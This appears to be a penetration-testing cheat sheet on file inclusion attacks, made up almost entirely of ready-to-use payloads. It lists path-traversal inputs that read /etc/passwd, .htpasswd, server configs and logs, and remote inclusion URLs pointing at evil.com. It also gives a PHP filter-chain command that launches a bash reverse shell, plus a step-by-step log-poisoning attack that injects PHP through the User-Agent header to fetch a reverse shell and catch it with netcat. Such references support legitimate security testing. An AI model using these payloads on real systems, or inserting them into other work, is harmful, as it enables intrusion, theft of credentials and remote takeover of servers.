File Inclusion
Last modified: 2023-03-14
Local File Inclusion (LFI) and Remote File Inclusion (RFI) are vulnerabilities that are often found to affect web applications that rely on a scripting run time.
Local File Inclusion (LFI)
?page=../
?page=/etc/passwd
?page=../../../../etc/passwd
?page=../../../../../etc/passwd
?page=..//..//..//..//..//etc/passwd
?page=....//....//....//....//etc/passwd
?page=....//....//....//....//....//....//etc/passwd
?page=../../../../../../../../../../../../../../etc/passwd
?page=..\/..\/..\/..\/etc/passwd
?page=..%2F..%2F..%2F..%2Fetc/passwd
?page=..%5C..%5C..%5C..%5cetc/passwd
?page=..%252f..%252f..%252f..%252fetc/passwd
?page=/etc/passwd&
?page=/etc/passwd%00
?page=/etc/passwd%00.inc
?page=/etc/passwd%00.php
?page=http://localhost/index
?page=http:%5c%5cindex
?page=http:%252f%252findex
?page=somedir/../../../../etc/passwd&ext=
# File scheme
?page=file:///etc/passwd
?page=file:%2F%2F%2Fetc%2Fpasswd
?page=file:%252F%252F%252Fetc%252Fpasswd
?page=file%3A///etc/passwd
?page=file%2A%2F%2F%2Fetc%2Fpasswd
?page=file%2A%252F%252F%252Fetc%252Fpasswd
?page=file://var/www/html/index.php
?page=file://var/www/<subdomain>/index.php
# Host
?page=/etc/hosts
# Cron
?page=/etc/crontab
# Apache
?page=/etc/apache2/sites-enabled/000-default.conf
?page=/etc/apache2/.htpasswd
?page=/var/log/apache/access.log
?page=/var/log/apache/error.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log
# Nginx
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log
?page=/etc/nginx/nginx.conf
?page=/etc/nginx/conf.d/.htpasswd
?page=/etc/nginx/sites-available/example.com.conf
?page=/etc/nginx/sites-enabled/example.com.conf
?page=/usr/local/nginx/conf/nginx.conf
?page=/usr/local/etc/nginx/nginx.conf
# PHP Filter
?page=php://filter/resource=/etc/passwd
?page=php://filter/read=string.rot13/resource=index.php
?page=php://filter/convert.base64-encode/resource=index.php
?page=pHp://filter/convert.base64-encode/resource=index.php
?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
?page=data://text/plain,<?php echo base64_encode(file_get_contents(“index.php”)); ?>
# Windows
?page=../../../../../../../../windows/system32/drivers/etc/hosts
Remote File Inclusion (RFI)
?page=//evil.com/exploit
?page=%2F%2fevil.com/exploit
?page=%2C%2Cevil.com/exploit
?page=http://evil.com/exploit
?page=http%3A//evil.com/exploit
?page=http%3A%2F%2Fevil%2Ecom/exploit
?page=http%253A%252F%252Fevil%252Ecom/
?page=test@sub.example.com/
Remote Code Execution (RCE)
php_filter_chain_generator is CLI that generates payload for PHP filter bypass and allow us to RCE.
Below is the payload for reverse shell.
wget https://raw.githubusercontent.com/synacktiv/php_filter_chain_generator/main/php_filter_chain_generator.py
python3 php_filter_chain_generator.py --chain "<?php system('bash -c \"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1\"')?>"
Then copy the output and paste it to the target.
Log Poisoning
1. Check if You Can Access the Apache Log File
# Debian, Ubuntu Linux
/?page=/var/log/apache/access.log
/?page=../../../../var/log/apache/access.log
/?page=/var/log/apache2/access.log
/?page=../../../../var/log/apache2/access.log
# FreeBSD Linux
/?page=/var/log/httpd-access.log
/?page=../../../../var/log/httpd-access.log
# CentOS, Fedora, RedHat Linux
/?page=/var/log/httpd/access_log
/?page=../../../../var/log/httpd/access_log
2. Prepare the Payload for PHP Reverse Shell
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
# Edit the values in the payload
$ip = '<attacker-ip>';
$port = 4444;
3. Open Web Server in Local Machine
python -m http.server 80
4. Inject PHP Payload in the User-Agent
Send the GET Request with abusing the User-Agent.
The payload can be uploaded to the /shell.php
of the target website.
GET / HTTP/1.1
...
User-Agent: <?php file_put_contents('shell.php', file_get_contents('http://<attacker-ip>/shell.php')); ?>
5. Apply the Injection
Refresh the page /index.php?page=../../../../var/log/apache2/access.log
.
6. Open Listener for Reverse Shell
In you local machine, open the listener.
You need to specify the port which you set the section 2.
nc -lvnp 4444
7. Gain Access to Shell
Access to /shell.php
of the target website.
If it goes well, you can get a shell.